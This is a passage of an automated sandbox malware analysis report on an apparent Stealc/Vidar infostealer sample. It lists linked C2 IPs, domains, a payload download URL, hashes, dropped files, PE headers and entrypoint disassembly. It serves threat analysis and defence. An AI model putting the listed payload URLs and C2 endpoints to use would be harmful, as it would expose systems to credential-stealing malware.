                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                • VT rate limit hit for: 6X4BIzTTBR.exe

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                16:47:09API Interceptor8585338x Sleep call for process: 6X4BIzTTBR.exe modified
                                16:47:55API Interceptor1x Sleep call for process: WerFault.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                176.113.115.37vwkb5DQRAL.exeGet hashmaliciousStealc, VidarBrowse
                                • 176.113.115.37/ScreenUpdateSync.exe
                                IeccNv7PP6.exeGet hashmaliciousStealc, VidarBrowse
                                • 176.113.115.37/ScreenUpdateSync.exe
                                XOr3Kqyo9n.exeGet hashmaliciousStealcBrowse
                                • 176.113.115.37/ScreenUpdateSync.exe
                                0r9PL33C8E.exeGet hashmaliciousStealcBrowse
                                • 176.113.115.37/ScreenUpdateSync.exe
                                Pw2KHOL9Z8.exeGet hashmaliciousStealcBrowse
                                • 176.113.115.37/ScreenUpdateSync.exe
                                Tg3sk2wywR.exeGet hashmaliciousStealcBrowse
                                • 176.113.115.37/ScreenUpdateSync.exe
                                x8AH98H0eQ.exeGet hashmaliciousStealcBrowse
                                • 176.113.115.37/ScreenUpdateSync.exe
                                x8AH98H0eQ.exeGet hashmaliciousUnknownBrowse
                                • 176.113.115.37/ScreenUpdateSync.exe
                                zGHItMC5Zc.exeGet hashmaliciousStealcBrowse
                                • 176.113.115.37/ScreenUpdateSync.exe
                                ozcAR7VO6Y.exeGet hashmaliciousStealcBrowse
                                • 176.113.115.37/ScreenUpdateSync.exe
                                172.67.179.207IeccNv7PP6.exeGet hashmaliciousStealc, VidarBrowse
                                  XOr3Kqyo9n.exeGet hashmaliciousStealcBrowse
                                    0r9PL33C8E.exeGet hashmaliciousStealcBrowse
                                      Pw2KHOL9Z8.exeGet hashmaliciousStealcBrowse
                                        o3QbCA4xLs.exeGet hashmaliciousStealc, VidarBrowse
                                          XhYAqi0wi5.exeGet hashmaliciousStealcBrowse
                                            Uviv7rEtnt.exeGet hashmaliciousStealc, VidarBrowse
                                              GK059kPZ5B.exeGet hashmaliciousStealcBrowse
                                                w12rykWq2L.exeGet hashmaliciousStealcBrowse
                                                  sgM0Akbldk.exeGet hashmaliciousStealcBrowse
                                                    92.255.57.88vwkb5DQRAL.exeGet hashmaliciousStealc, VidarBrowse
                                                    • 92.255.57.88/7bbacc20a3bd2eb5.php
                                                    6a969fa1ba45ea3d679dbd124e030d82a0ea879d9f97b.exeGet hashmaliciousStealcBrowse
                                                    • 92.255.57.88/7bbacc20a3bd2eb5.php
                                                    IeccNv7PP6.exeGet hashmaliciousStealc, VidarBrowse
                                                    • 92.255.57.88/7bbacc20a3bd2eb5.php
                                                    X4roU7TtF1.exeGet hashmaliciousStealcBrowse
                                                    • 92.255.57.88/7bbacc20a3bd2eb5.php

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    post-to-me.comvwkb5DQRAL.exeGet hashmaliciousStealc, VidarBrowse
                                                    • 104.21.56.70
                                                    IeccNv7PP6.exeGet hashmaliciousStealc, VidarBrowse
                                                    • 172.67.179.207
                                                    XOr3Kqyo9n.exeGet hashmaliciousStealcBrowse
                                                    • 172.67.179.207
                                                    0r9PL33C8E.exeGet hashmaliciousStealcBrowse
                                                    • 172.67.179.207
                                                    Pw2KHOL9Z8.exeGet hashmaliciousStealcBrowse
                                                    • 172.67.179.207
                                                    Tg3sk2wywR.exeGet hashmaliciousStealcBrowse
                                                    • 104.21.56.70
                                                    x8AH98H0eQ.exeGet hashmaliciousStealcBrowse
                                                    • 104.21.56.70
                                                    x8AH98H0eQ.exeGet hashmaliciousUnknownBrowse
                                                    • 104.21.56.70
                                                    zGHItMC5Zc.exeGet hashmaliciousStealcBrowse
                                                    • 104.21.56.70
                                                    ozcAR7VO6Y.exeGet hashmaliciousStealcBrowse
                                                    • 104.21.56.70

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    SELECTELRUvwkb5DQRAL.exeGet hashmaliciousStealc, VidarBrowse
                                                    • 176.113.115.37
                                                    IeccNv7PP6.exeGet hashmaliciousStealc, VidarBrowse
                                                    • 176.113.115.37
                                                    file.exeGet hashmaliciousUnknownBrowse
                                                    • 176.113.115.177
                                                    qlI3ReINCV.exeGet hashmaliciousStealc, VidarBrowse
                                                    • 176.113.115.215
                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                    • 176.113.115.203
                                                    XOr3Kqyo9n.exeGet hashmaliciousStealcBrowse
                                                    • 176.113.115.37
                                                    0r9PL33C8E.exeGet hashmaliciousStealcBrowse
                                                    • 176.113.115.37
                                                    Pw2KHOL9Z8.exeGet hashmaliciousStealcBrowse
                                                    • 176.113.115.37
                                                    Tg3sk2wywR.exeGet hashmaliciousStealcBrowse
                                                    • 176.113.115.37
                                                    x8AH98H0eQ.exeGet hashmaliciousStealcBrowse
                                                    • 176.113.115.37
                                                    TELSPRUvwkb5DQRAL.exeGet hashmaliciousStealc, VidarBrowse
                                                    • 92.255.57.88
                                                    6a969fa1ba45ea3d679dbd124e030d82a0ea879d9f97b.exeGet hashmaliciousStealcBrowse
                                                    • 92.255.57.88
                                                    UzbLVhqAQ9.exeGet hashmaliciousRedLineBrowse
                                                    • 92.255.57.31
                                                    IeccNv7PP6.exeGet hashmaliciousStealc, VidarBrowse
                                                    • 92.255.57.88
                                                    X4roU7TtF1.exeGet hashmaliciousStealcBrowse
                                                    • 92.255.57.88
                                                    Ldr-2.dllGet hashmaliciousUnknownBrowse
                                                    • 92.255.57.46
                                                    https://drugfreesport.info/lqb4sGet hashmaliciousPhisherBrowse
                                                    • 92.255.57.46
                                                    Setup.msiGet hashmaliciousUnknownBrowse
                                                    • 92.255.57.46
                                                    https://iop360.net/jsg2nGet hashmaliciousUnknownBrowse
                                                    • 92.255.57.104
                                                    tHvjY1G08Y.exeGet hashmaliciousCookie Stealer RedLine SmokeLoader Socelars Zealer Stealer onlyLoggerBrowse
                                                    • 92.255.57.249
                                                    CLOUDFLARENETUShttps://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/6354799604_PDF.htmlGet hashmaliciousScreenConnect ToolBrowse
                                                    • 1.1.1.1
                                                    AID0109FLT24DO53CD-F.pdfGet hashmaliciousUnknownBrowse
                                                    • 104.18.11.207
                                                    https://link.edgepilot.com/s/3b095c08/ZyRgSnzc50mRg_8d-46dUQ?u=https://kingdompch.com/Get hashmaliciousUnknownBrowse
                                                    • 104.21.38.19
                                                    file.exeGet hashmaliciousUnknownBrowse
                                                    • 104.21.80.208
                                                    vwkb5DQRAL.exeGet hashmaliciousStealc, VidarBrowse
                                                    • 104.21.56.70
                                                    http://img1.wsimg.com/blobby/go/fae029f6-27b1-4578-94bc-ae0bbaeebde4/downloads/buluxanitoteras.pdfGet hashmaliciousUnknownBrowse
                                                    • 104.21.48.245
                                                    https://eye.sbc31.net/m2?r=wAXNB1S4NjcyYWE1OWU4YjU5ODMzOTIyMDE1MThlxBDQudCvf9DH0Ns5RGzQktCKZ2wrLUbgpHRlc3Sxc2FtcGxlQHNhbXBsZS5jb22sKzMzNjEyMzQ1Njc4kLZEV3ZCbHJ1Y1JZMlFIa1B1LVVTTS1BoA==Get hashmaliciousHTMLPhisherBrowse
                                                    • 172.67.140.230
                                                    https://link.mail.beehiiv.com/ls/click?upn=u001.KDDa4SKH91gcnCIm13FUDjBk8DnozwkSdxe-2BLMCJAa8TiKDhd-2B38pl782PnlKrmgzQTjD8fATdnwc5QgneqdUjWYx5D82QC2JajKOD5dhwQf6nBS9x6PxACdxqZ-2BVvfXSFr536dEl71Z4-2B0lKXrlBq2I7OGOUfe9d0qU6CGc-2Fmfk3q0WwhO42BOQi8aYKh6VoV-2Fvh8sTRNP-2FzICpX0YMfHxlEW7fbg9SV-2BZbNdkv2-2Fpl72tpteDYdTlwajVUY00F0PHA_ZF37BJsSpeg2ggKro0Kw1JZi2Q7X5lMR4GcQUR-2F5GPPdktqhJXeC-2Bsy71uIylML6XXkLS1FYaxFM495ZF5HfT0kw37Vy5JEgIau55HagsDPP2WniEKQdRVUyQJDaH4w-2F2p6KuwGHUKUEB38nhc92t8hXLjbu-2FxKQqxpAf-2FIB1EdEcuDPVgMcwWoZKV6-2FqV3HrDnxqjceVv4CXxtjZ2JkO-2FUQ9O68DpCM-2F5dMvT-2FayKu2U6pF5JC6uPW18Z2ptqBTGPNdoimmFZuTI-2BzLIJuacRYcsFhvk-2FwCd5-2FfgR9VaRTivmwUCmaQtKoAP0BOnzwqcmyDGFhpcYOdxVqyJWSy-2B743S17rkeGe7waWwJLboNXwyMd-2B9s8I3MOfBk2TtelNM0qBGTIKvZZMmOPaGvvxbvCz8i7Yz-2FsuCfpo46vACb3GxE1l0-2FAMv8NYCoN3rK-2BbGet hashmaliciousUnknownBrowse
                                                    • 104.17.25.14
                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                    • 172.64.41.3
                                                    635614_thermofisher.comCQDM.htmlGet hashmaliciousUnknownBrowse
                                                    • 104.16.124.96

                                                    JA3 Fingerprints

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    37f463bf4616ecd445d4a1937da06e19vwkb5DQRAL.exeGet hashmaliciousStealc, VidarBrowse
                                                    • 172.67.179.207
                                                    z51awb_shipping.cmdGet hashmaliciousGuLoader, RemcosBrowse
                                                    • 172.67.179.207
                                                    file.exeGet hashmaliciousVidarBrowse
                                                    • 172.67.179.207
                                                    Viderefrt.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                    • 172.67.179.207
                                                    Dysacousma41.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                    • 172.67.179.207
                                                    vhzLtwlZJY.exeGet hashmaliciousUnknownBrowse
                                                    • 172.67.179.207
                                                    IeccNv7PP6.exeGet hashmaliciousStealc, VidarBrowse
                                                    • 172.67.179.207
                                                    INV-0542.pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                    • 172.67.179.207
                                                    MSM8C42iAN.exeGet hashmaliciousDarkCloudBrowse
                                                    • 172.67.179.207
                                                    November Quotation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                    • 172.67.179.207

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ED60.tmp.exe_97b3b99dce35ce554467c8234bd85779e4d5261_4ec1be0e_f54d5a2c-77ba-48df-ad2f-907de3101355\Report.wer

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):65536
                                                    Entropy (8bit):0.9637118487705912
                                                    Encrypted:false
                                                    SSDEEP:96:OMe9Gt2uZsVwEnSRfKQXIDcQVc6soGcE+cw3Q+HbHg/8BRTf3o8Fa9OyRgTvXNta:fOuZj07IzEtj/XZrP2izuiF3Z24IO8N
                                                    MD5:FAAF86B0373DE2169A5FF627383C78BF
                                                    SHA1:4B250D092ABB8EB2FDD8412C2CF143DE7ECEF444
                                                    SHA-256:92600848A4D1502C7A4CEEDA6CFDFDB3525548B6D980BB01FB015BAF60153002
                                                    SHA-512:870AC9366839493FB8ACF98E5727E96228A93FDE2ECFD866D91186D01C6F3A2F261F3EA081FF5C582BF823D91B32043B75462E4AAE83EF265C7E6EDCDA3D051B
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.1.3.1.2.5.0.1.6.5.5.1.0.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.1.3.1.2.5.0.6.9.6.7.5.2.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.5.4.d.5.a.2.c.-.7.7.b.a.-.4.8.d.f.-.a.d.2.f.-.9.0.7.d.e.3.1.0.1.3.5.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.4.8.7.7.4.8.5.-.f.e.0.1.-.4.f.1.c.-.a.f.e.6.-.b.8.d.6.4.5.d.3.4.a.e.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.E.D.6.0...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.6.c.-.0.0.0.1.-.0.0.1.4.-.e.6.4.9.-.e.c.b.f.4.c.4.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.7.e.6.1.1.6.5.a.c.4.f.3.1.f.c.b.9.e.a.0.d.6.c.6.4.e.9.3.7.6.4.0.0.0.0.1.6.0.2.!.0.0.0.0.6.a.e.3.6.8.e.7.f.a.c.f.d.0.0.2.3.6.f.4.1.9.a.2.a.0.a.d.e.6.9.0.c.6.0.c.b.d.8.3.!.E.D.6.0...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.

                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER78F.tmp.dmp

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Mini DuMP crash report, 14 streams, Tue Nov 26 21:47:30 2024, 0x1205a4 type
                                                    Category:dropped
                                                    Size (bytes):61290
                                                    Entropy (8bit):1.8495091266436758
                                                    Encrypted:false
                                                    SSDEEP:192:Ls8YiJX8bWDwX5VOQOJwPZV7VimtBS3LClyUoBa9fdi2wdjdKfVM0NP8fV:LHYvbWDy4QEWumLlrTmxP02N
                                                    MD5:51090864228B31FB64CB675CE2927C80
                                                    SHA1:BC9857B7F47E71EFE30F82ECAA1397F308A3D559
                                                    SHA-256:B169A222AC44AB9FEB7D42A8EA98BFBEE0DBF41FCF4E734ECC174E71F965B39E
                                                    SHA-512:04474DE80451AF1E3ED424F5BA533422598BB5ED7F779301FF793CEF16F23B0E28078D3B626DA3770CE3E33F6DAC76668F3AD72E7E7E5900DADF370A772AF1F5
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:MDMP..a..... ........AFg............4...............<.......t....*..........T.......8...........T............2..........................................................................................................eJ......H.......GenuineIntel............T.......l....AFg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER8AA.tmp.WERInternalMetadata.xml

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):8328
                                                    Entropy (8bit):3.6971596548633197
                                                    Encrypted:false
                                                    SSDEEP:192:R6l7wVeJSfl6H6YFr6SgmfpQPpDT89bh9sf8Lm:R6lXJw6H6Y56SgmfpQuh2fd
                                                    MD5:C7475FEC839F7016CC3FDBDAE12D2408
                                                    SHA1:23B45ABBE98D9FDDA0A5D8794A5A7981AC793CF4
                                                    SHA-256:2D886E54884190D2AE8426BE55B437470947BD989E83E74DE9EEACAEBACEDBFC
                                                    SHA-512:5EB2D6D5463A702CD2DB62C5C494DC6069D3A18304085EF692965D19E7F7835B217E6F4DA12B67C86B278A510EF29617F96EC3B8B7300AF867C503D5CAD3DB59
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.3.2.<./.P.i.

                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DA.tmp.xml

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4569
                                                    Entropy (8bit):4.439851969695957
                                                    Encrypted:false
                                                    SSDEEP:48:cvIwWl8zsRJg77aI9DgWpW8VYWYm8M4J9SiDFyX+q8YtxQI9wbwd:uIjfjI7FZ7VeJ9BIXbt+I9wbwd
                                                    MD5:AEA1F879FB7A87528045731C843EC04D
                                                    SHA1:F4FADEEABBDD3577ABC8AE6D49D7336CD65F08C4
                                                    SHA-256:7C3DC04E242C46359F8D9EA11ACF508A6F643EC68F81188B86C5819116B4DC32
                                                    SHA-512:1AB460D2C2D30CD303F00D1ACFDAAD56F56BD1B7F14573A2A1CBE01B220D9EDC81F23BEC41DB285BB7C6AF83131520E8401C8204E8815E0E9B9E96EA7C511560
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="605570" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe

                                                    Download File
                                                    Process:C:\Users\user\Desktop\6X4BIzTTBR.exe
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):286208
                                                    Entropy (8bit):6.465763879883113
                                                    Encrypted:false
                                                    SSDEEP:3072:pT2Bl1DMxK1kiekp7UjHGm6iSMnnqr7Nh3T+R9aN3LI2N7sIVI56zr/Tw5ACv5Vq:pT+XDEgUim6iSMn8PosN3Nei/
                                                    MD5:A969307FDB2862755469583A5D9BEA48
                                                    SHA1:6AE368E7FACFD00236F419A2A0ADE690C60CBD83
                                                    SHA-256:FCE03F73CAD97C884E0A45F073900ED19B432DCFC9173D91CF443C2FC6AC28F6
                                                    SHA-512:5DC36DA5226CE46E6F1AECA70D0877433C90B7EB977DBD41F5B648B65A1EC8AE4703FBE5828DBF8B77A7BA83DBD2A711ADA81EA4FF1307F0E76B21736EE705B2
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 34%
                                                    Reputation:low
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........{~..{~..{~..4.{~..)...{~..).{~..)...{~......{~..{...{~..).{~..).{~..).{~.Rich.{~.................PE..L......f.................&...de..............@....@..........................ph..............................................Y..P.....g..............................................................................@...............................text...[%.......&.................. ..`.rdata..P#...@...$...*..............@..@.data.....c..p.......N..............@....xuxoz..HI...`g..>...j..............@....rsrc.........g.....................@..@........................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\ED60.tmp.exe

                                                    Download File
                                                    Process:C:\Users\user\Desktop\6X4BIzTTBR.exe
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):286208
                                                    Entropy (8bit):6.465763879883113
                                                    Encrypted:false
                                                    SSDEEP:3072:pT2Bl1DMxK1kiekp7UjHGm6iSMnnqr7Nh3T+R9aN3LI2N7sIVI56zr/Tw5ACv5Vq:pT+XDEgUim6iSMn8PosN3Nei/
                                                    MD5:A969307FDB2862755469583A5D9BEA48
                                                    SHA1:6AE368E7FACFD00236F419A2A0ADE690C60CBD83
                                                    SHA-256:FCE03F73CAD97C884E0A45F073900ED19B432DCFC9173D91CF443C2FC6AC28F6
                                                    SHA-512:5DC36DA5226CE46E6F1AECA70D0877433C90B7EB977DBD41F5B648B65A1EC8AE4703FBE5828DBF8B77A7BA83DBD2A711ADA81EA4FF1307F0E76B21736EE705B2
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 34%
                                                    Reputation:low
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........{~..{~..{~..4.{~..)...{~..).{~..)...{~......{~..{...{~..).{~..).{~..).{~.Rich.{~.................PE..L......f.................&...de..............@....@..........................ph..............................................Y..P.....g..............................................................................@...............................text...[%.......&.................. ..`.rdata..P#...@...$...*..............@..@.data.....c..p.......N..............@....xuxoz..HI...`g..>...j..............@....rsrc.........g.....................@..@........................................................................................................................................................................................................................................................................................................................

                                                    C:\Windows\appcompat\Programs\Amcache.hve

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:MS Windows registry file, NT/2000 or above
                                                    Category:dropped
                                                    Size (bytes):1835008
                                                    Entropy (8bit):4.4654045640696705
                                                    Encrypted:false
                                                    SSDEEP:6144:TIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNmdwBCswSbK:EXD94+WlLZMM6YFHM+K
                                                    MD5:99E9203001F632FBDAB2C784583BBF3D
                                                    SHA1:C72821DD6AB934A065442A09D01E82AFFCF1A436
                                                    SHA-256:937B51B7453E517F2A28040137A195CAA5F6E0522C0AC00AC9AF76D07A2E32D0
                                                    SHA-512:BD92EABA855A18946D28AC28E51D962C1D35133FE8B631B57F4635BE24EA1EF092BBDDEC8507D3D8B6E4963F0A7791FAA75BD62B10344368DDB126D236729EAE
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...L@..............................................................................................................................................................................................................................................................................................................................................d(..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Entropy (8bit):7.147837343312306
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:6X4BIzTTBR.exe
                                                    File size:413'184 bytes
                                                    MD5:5a45cfe0b266362b482cace7205c2c32
                                                    SHA1:29bdfb28ebeba5b07571898bf514e9f624606293
                                                    SHA256:a0e267be6b982f374175ffc83be37b3fcf351cbd1e9ee899d02fb7c722c55c7b
                                                    SHA512:03b613fef8c2c5e7136e3200d3d9097c7c0002acd6958a669fd078d1a7a78f5b62fe2afdd5c8609f9b64c5074f7d0012a3bcc6e86c917f601e5aab20fdfbbfdf
                                                    SSDEEP:6144:7MmB1z/wAu1tN0i1yZkdy3F4vLY5F5yp91gDO2t+ZGeS8y8PZ:7Mmrozj15IFMEypfQsGH8
                                                    TLSH:7B94F0217AF09131F3F75A341AB497905E7BB8B3AA71D44F23A4066A1E31BE08F21757
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............{~..{~..{~..4...{~..)...{~..)...{~..)...{~......{~..{...{~..)...{~..)...{~..)...{~.Rich.{~.................PE..L......d...

                                                    File Icon

                                                    Icon Hash:46c7c30b0f0e0d59

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x401906
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                    DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x64F48E0B [Sun Sep 3 13:45:47 2023 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:5
                                                    OS Version Minor:0
                                                    File Version Major:5
                                                    File Version Minor:0
                                                    Subsystem Version Major:5
                                                    Subsystem Version Minor:0
                                                    Import Hash:f6afe1d4f723ac968dae096d10844733

                                                    Entrypoint Preview

                                                    Instruction
                                                    call 00007FB7D9362B5Ah
                                                    jmp 00007FB7D935F89Dh
                                                    mov edi, edi
                                                    push ebp
                                                    mov ebp, esp
                                                    sub esp, 00000328h
                                                    mov dword ptr [00457C08h], eax
                                                    mov dword ptr [00457C04h], ecx
                                                    mov dword ptr [00457C00h], edx
                                                    mov dword ptr [00457BFCh], ebx
                                                    mov dword ptr [00457BF8h], esi
                                                    mov dword ptr [00457BF4h], edi
                                                    mov word ptr [00457C20h], ss
                                                    mov word ptr [00457C14h], cs
                                                    mov word ptr [00457BF0h], ds
                                                    mov word ptr [00457BECh], es
                                                    mov word ptr [00457BE8h], fs
                                                    mov word ptr [00457BE4h], gs
                                                    pushfd
                                                    pop dword ptr [00457C18h]
                                                    mov eax, dword ptr [ebp+00h]
                                                    mov dword ptr [00457C0Ch], eax
                                                    mov eax, dword ptr [ebp+04h]
                                                    mov dword ptr [00457C10h], eax
                                                    lea eax, dword ptr [ebp+08h]
                                                    mov dword ptr [00457C1Ch], eax
                                                    mov eax, dword ptr [ebp-00000320h]
                                                    mov dword ptr [00457B58h], 00010001h
                                                    mov eax, dword ptr [00457C10h]
                                                    mov dword ptr [00457B0Ch], eax
                                                    mov dword ptr [00457B00h], C0000409h
                                                    mov dword ptr [00457B04h], 00000001h
                                                    mov eax, dword ptr [00456008h]
                                                    mov dword ptr [ebp-00000328h], eax
                                                    mov eax, dword ptr [0045600Ch]
                                                    mov dword ptr [ebp-00000324h], eax
                                                    call dword ptr [000000D8h]

                                                    Rich Headers

                                                    Programming Language:
                                                    • [C++] VS2008 build 21022
                                                    • [ASM] VS2008 build 21022
                                                    • [ C ] VS2008 build 21022
                                                    • [IMP] VS2005 build 50727
                                                    • [RES] VS2008 build 21022
                                                    • [LNK] VS2008 build 21022

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x5499c0x50.rdata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x269a0000xb5c0.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x545400x40.rdata
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x530000x1a8.rdata
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
